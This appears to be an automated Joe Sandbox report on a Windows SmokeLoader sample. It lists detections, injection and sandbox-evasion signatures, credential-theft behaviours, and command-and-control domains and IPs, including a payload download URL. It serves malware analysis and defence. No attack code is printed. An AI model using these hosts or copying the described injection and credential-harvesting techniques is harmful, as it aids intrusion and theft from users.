    System Network Configuration Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    Hidden Files and Directories    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529186 Sample: O4zPA1oI9Y.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 53 nwgrus.ru 2->53 55 ninjahallnews.com 2->55 57 2 other IPs or domains 2->57 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 6 other signatures 2->77 10 O4zPA1oI9Y.exe 2->10         started        13 jvgasii 2->13         started        15 uegasii 2->15         started        17 msiexec.exe 2->17         started        signatures3 process4 signatures5 119 Detected unpacking (changes PE section rights) 10->119 121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->121 123 Maps a DLL or memory area into another process 10->123 125 Switches to a custom stack to bypass stack traces 10->125 19 explorer.exe 69 9 10->19 injected 127 Antivirus detection for dropped file 13->127 129 Multi AV Scanner detection for dropped file 13->129 131 Machine Learning detection for dropped file 13->131 133 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->133 135 Checks if the current machine is a virtual machine (disk enumeration) 15->135 137 Creates a thread in another existing process (thread injection) 15->137 process6 dnsIp7 59 23.145.40.164, 443, 61410 SURFAIRWIRELESS-IN-01US Reserved 19->59 61 ninjahallnews.com 23.145.40.168, 443, 61433, 61434 SURFAIRWIRELESS-IN-01US Reserved 19->61 63 2 other IPs or domains 19->63 45 C:\Users\user\AppData\Roaming\uegasii, PE32 19->45 dropped 47 C:\Users\user\AppData\Roaming\jvgasii, PE32 19->47 dropped 49 C:\Users\user\AppData\Local\Temp\DE97.exe, PE32 19->49 dropped 51 2 other malicious files 19->51 dropped 85 System process connects to network (likely due to code injection or exploit) 19->85 87 Benign windows process drops PE files 19->87 89 Injects code into the Windows Explorer (explorer.exe) 19->89 91 3 other signatures 19->91 24 8CAE.exe 2 19->24         started        27 DE97.exe 19->27         started        29 explorer.exe 20 19->29         started        31 5 other processes 19->31 file8 signatures9 process10 signatures11 93 Multi AV Scanner detection for dropped file 24->93 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->95 97 Machine Learning detection for dropped file 24->97 115 2 other signatures 24->115 33 cmd.exe 24->33         started        99 Detected unpacking (changes PE section rights) 27->99 101 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->101 103 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 27->103 117 4 other signatures 27->117 105 System process connects to network (likely due to code injection or exploit) 29->105 107 Found evasive API chain (may stop execution after checking mutex) 29->107 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->109 111 Tries to steal Mail credentials (via file / registry access) 29->111 113 Tries to harvest and steal browser information (history, passwords, etc) 31->113 process12 signatures13 65 Uses netsh to modify the Windows network and firewall settings 33->65 67 Uses ipconfig to lookup or modify the Windows network settings 33->67 69 Modifies the windows firewall 33->69 36 WMIC.exe 33->36         started        39 systeminfo.exe 33->39         started        41 conhost.exe 33->41         started        43 17 other processes 33->43 process14 signatures15 79 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->79 81 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->81 83 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 36->83

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    O4zPA1oI9Y.exe79%ReversingLabsWin32.Trojan.SmokeLoader
    O4zPA1oI9Y.exe100%AviraHEUR/AGEN.1312571
    O4zPA1oI9Y.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\jvgasii100%AviraHEUR/AGEN.1312571
    C:\Users\user\AppData\Local\Temp\8CAE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\jvgasii100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\uegasii100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\DE97.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\8CAE.exe42%ReversingLabsWin64.Trojan.Generic
    C:\Users\user\AppData\Roaming\jvgasii79%ReversingLabsWin32.Trojan.SmokeLoader

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://www.ecosia.org/newtab/0%URL Reputationsafe
    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    		199.232.214.172
    		truefalse
      		unknown
      ninjahallnews.com
      		23.145.40.168
      		truetrue
        		unknown
        nwgrus.ru
        		160.177.223.165
        		truetrue
          		unknown
          18.31.95.13.in-addr.arpa
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://23.145.40.164/ksa9104.exetrue
              		unknown
              https://ninjahallnews.com/search.phptrue
                		unknown
                https://fallhandbat.com/search.phptrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.msn.com/Iexplorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ninjahallnews.com/search.phpMozilla/5.0explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3175208514.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4580797896.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4580427782.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4580422286.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4580424413.0000000000BD9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://word.office.comMexplorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.microexplorer.exe, 00000002.00000000.2218524683.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2216870595.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2218534895.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://wns.windows.com/eexplorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2222332214.000000000C36B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                                        		unknown
                                        https://ninjahallnews.com/explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3226508578.0000000002ABB000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown
                                          https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000D.00000002.3226508578.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://excel.office.com-explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.ecosia.org/newtab/explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ninjahallnews.com/search.phpoexplorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://powerpoint.office.comEMdexplorer.exe, 00000002.00000000.2222332214.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://ninjahallnews.com/earch.php;Lexplorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2222332214.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.comeexplorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://api.msn.com/explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://ninjahallnews.com//explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      23.145.40.168
                                                                                      		ninjahallnews.comReserved
                                                                                      		22631SURFAIRWIRELESS-IN-01UStrue
                                                                                      190.249.249.14
                                                                                      		unknownColombia
                                                                                      		13489EPMTelecomunicacionesSAESPCOtrue
                                                                                      23.145.40.164
                                                                                      		unknownReserved
                                                                                      		22631SURFAIRWIRELESS-IN-01UStrue
                                                                                      160.177.223.165
                                                                                      		nwgrus.ruMorocco
                                                                                      		36903MT-MPLSMAtrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1529186
                                                                                      Start date and time:2024-10-08 18:22:05 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 12m 7s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:41
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:O4zPA1oI9Y.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:2942cb9fca04e939af4ed1eef717e123.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@61/15@9/4
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 166
                                                                                      • Number of non-executed functions: 92
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 40.113.103.199, 4.245.163.56, 172.202.163.200, 20.12.23.50, 40.115.3.253
                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: O4zPA1oI9Y.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      12:23:13API Interceptor331614x Sleep call for process: explorer.exe modified
                                                                                      12:24:56API Interceptor14x Sleep call for process: WMIC.exe modified
                                                                                      18:23:24Task SchedulerRun new task: Firefox Default Browser Agent 2F0F3A93C35A146B path: C:\Users\user\AppData\Roaming\jvgasii
                                                                                      18:24:18Task SchedulerRun new task: Firefox Default Browser Agent 55CFE31E989DA996 path: C:\Users\user\AppData\Roaming\uegasii

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      23.145.40.1685zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                          ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                            bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                              23.145.40.1645zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                  ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                    bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                        UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                          LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                            wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                              HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  nwgrus.ru5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 181.52.122.51
                                                                                                                  Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 63.143.98.185
                                                                                                                  ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 180.75.11.133
                                                                                                                  bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 109.175.29.39
                                                                                                                  BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 105.197.97.247
                                                                                                                  UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 185.12.79.25
                                                                                                                  LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 197.164.156.210
                                                                                                                  wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 190.147.128.172
                                                                                                                  HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 177.129.90.106
                                                                                                                  c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 190.147.2.86
                                                                                                                  ninjahallnews.com5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.168
                                                                                                                  Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.168
                                                                                                                  ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.168
                                                                                                                  bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.168
                                                                                                                  bg.microsoft.map.fastly.netY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 199.232.210.172
                                                                                                                  Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                  • 199.232.210.172
                                                                                                                  https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                                                                  • 199.232.210.172
                                                                                                                  https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                                                                  • 199.232.214.172
                                                                                                                  http://js.schema-forms.orgGet hashmaliciousUnknownBrowse
                                                                                                                  • 199.232.214.172
                                                                                                                  https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBdGet hashmaliciousUnknownBrowse
                                                                                                                  • 199.232.214.172
                                                                                                                  http://customer.thewayofmoney.usGet hashmaliciousUnknownBrowse
                                                                                                                  • 199.232.210.172
                                                                                                                  5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 199.232.210.172
                                                                                                                  Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                  • 199.232.214.172
                                                                                                                  Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 199.232.210.172

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  SURFAIRWIRELESS-IN-01US5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.164
                                                                                                                  Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.164
                                                                                                                  ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.164
                                                                                                                  bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.164
                                                                                                                  BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.164
                                                                                                                  UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  • 23.145.40.164
